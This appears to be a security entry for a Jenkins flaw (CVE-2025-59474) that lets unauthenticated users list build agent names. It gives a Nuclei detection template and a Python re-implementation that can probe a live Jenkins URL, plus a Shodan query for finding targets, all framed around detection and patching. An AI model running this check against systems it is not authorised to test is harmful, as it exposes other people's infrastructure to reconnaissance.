Jenkins 2.527 and earlier, and LTS 2.516.2 and earlier, do not perform a permission check in the sidepanel of a page that is intentionally accessible to users lacking Overall/Read permission. Attackers without Overall/Read permission can therefore list agent names through the sidepanel's executors widget.
PoC code [published]
id: CVE-2025-59474

info:
  name: Jenkins Sidepanel - Unauthorized Agent/Queue Exposure
  author: ivaldivieso
  severity: medium
  description: |
    Jenkins 2.527 and earlier, LTS 2.516.2 and earlier does not perform a permission check in the sidepanel of a page intentionally accessible to users lacking Overall/Read permission, allowing attackers without Overall/Read permission to list agent names through its sidepanel executors widget.
  impact: Attackers can list agent names without required permissions, potentially exposing sensitive infrastructure details.
  remediation: Update to a version later than 2.527 or LTS later than 2.516.2.
  reference:
    - https://www.jenkins.io/security/advisory/2025-09-17/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-59474
    - https://medium.com/@Th3hound/exposing-jenkins-agents-without-auth-research-on-cve-2025-59474-ff95a2e7d22a
  metadata:
    verified: true
    max-request: 2
    shodan-query: product:"jenkins"
  tags: cve,cve2025,jenkins,sidepanel,unauth,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/securityRealm/signup"
      - "{{BaseURL}}/jenkins/securityRealm/signup"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Build Executor Status'
          - 'Estado del ejecutor'
          - 'id="executors"'
        condition: or

      - type: regex
        part: body
        regex:
          - 'href="[^"]*/computer/[^"]*/?"'

    extractors:
      - type: regex
        name: agents
        part: body
        group: 1
        regex:
          - 'href="[^"]*/computer/([^"/]+)/?"'
        internal: true

      - type: dsl
        dsl:
          - 'urldecode(agents)'
# digest: 4a0a0047304502206c0c2b8d5f43427d574175ba0732aa2d631e691aff951a69fcbe015639534ef3022100865d934dc1e61af850f5bcab8a8b4d625ba71c87cf5ec28610a66bbfee8435be:922c64590222798bb761d5b6d8e72950
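The template above does three things: it requests the signup page (reachable without Overall/Read), confirms the executors widget was rendered into that page's sidepanel, and pulls agent names out of the widget's /computer/<name>/ links. The following Python script is an added example that reproduces that same logic outside Nuclei; it is not part of the template, the Nuclei project, or Jenkins. The sample HTML is constructed to look like the sidepanel the template expects and is not a real capture, and the only network call is made when a base URL is supplied on the command line.

```python
"""Standalone re-implementation of the CVE-2025-59474 Nuclei template's check.

Added example, not code from the template or from Jenkins. The HTML sample is
constructed for offline use; the target URL is an assumption taken from argv.
"""
import re
import sys
import urllib.parse
import urllib.request
from typing import List, Optional, Tuple

# Same two paths the template probes: Jenkins served at "/" and under "/jenkins"
SIGNUP_PATHS = ("/securityRealm/signup", "/jenkins/securityRealm/signup")

# Markers the template's word matcher accepts: English title, Spanish title, widget id
WIDGET_MARKERS = ("Build Executor Status", "Estado del ejecutor", 'id="executors"')

# Agent names appear as the path segment after /computer/ in the widget's links;
# "/computer/" alone (the overview link) has no segment and is deliberately skipped.
AGENT_LINK_RE = re.compile(r'href="[^"]*/computer/([^"/]+)/?"')


def extract_agents(html: str) -> List[str]:
    """Return agent names exposed by the executors widget, or [] if it is absent.

    Mirrors the template's matchers-condition "and": the widget marker must be
    present AND at least one /computer/<name>/ link must exist. Names are
    URL-decoded (the template's urldecode extractor) and de-duplicated in order.
    """
    if not any(marker in html for marker in WIDGET_MARKERS):
        return []
    seen = {}  # dict keeps insertion order, so repeated links collapse to one name
    for raw_name in AGENT_LINK_RE.findall(html):
        seen.setdefault(urllib.parse.unquote(raw_name), None)
    return list(seen)


def check_target(base_url: str, timeout: float = 10.0) -> Tuple[Optional[str], List[str]]:
    """Probe each signup path in turn (stop-at-first-match) and return (url, agents)."""
    for path in SIGNUP_PATHS:
        url = base_url.rstrip("/") + path
        req = urllib.request.Request(url, headers={"User-Agent": "cve-2025-59474-check"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                body = resp.read().decode("utf-8", errors="replace")
        except OSError:  # HTTPError/URLError (404, refused, TLS) -> try the next path
            continue
        agents = extract_agents(body)
        if agents:
            return url, agents
    return None, []


# Constructed sample of a vulnerable signup page's sidepanel; not a real capture.
# The duplicate linux-build-01 row and the URL-encoded name exercise the
# de-duplication and decoding paths.
SAMPLE_SIGNUP_HTML = """
<div id="side-panel">
  <div id="executors" class="container-fluid pane-frame">
    <a href="/computer/">Build Executor Status</a>
    <table class="pane">
      <tr><th class="pane"><a href="/computer/(built-in)/">Built-In Node</a></th></tr>
      <tr><th class="pane"><a href="/computer/linux-build-01/">linux-build-01</a></th></tr>
      <tr><th class="pane"><a href="/computer/win%20agent%2002/">win agent 02</a></th></tr>
      <tr><th class="pane"><a href="/computer/linux-build-01/">linux-build-01</a></th></tr>
    </table>
  </div>
</div>
"""


if __name__ == "__main__":
    if len(sys.argv) > 1:
        hit_url, names = check_target(sys.argv[1])
        print(f"{hit_url}: {names}" if names else "no agent names exposed on the signup page")
    else:
        print(extract_agents(SAMPLE_SIGNUP_HTML))
```

Run it with no arguments to see the parser work on the constructed sample, or pass a Jenkins base URL (for example `python check.py https://jenkins.example.invalid`) to run the live check. A patched instance, or one where the signup page is not reachable, yields no names; note that an empty result from the live check is not proof of a fix if the instance is simply not serving the signup page.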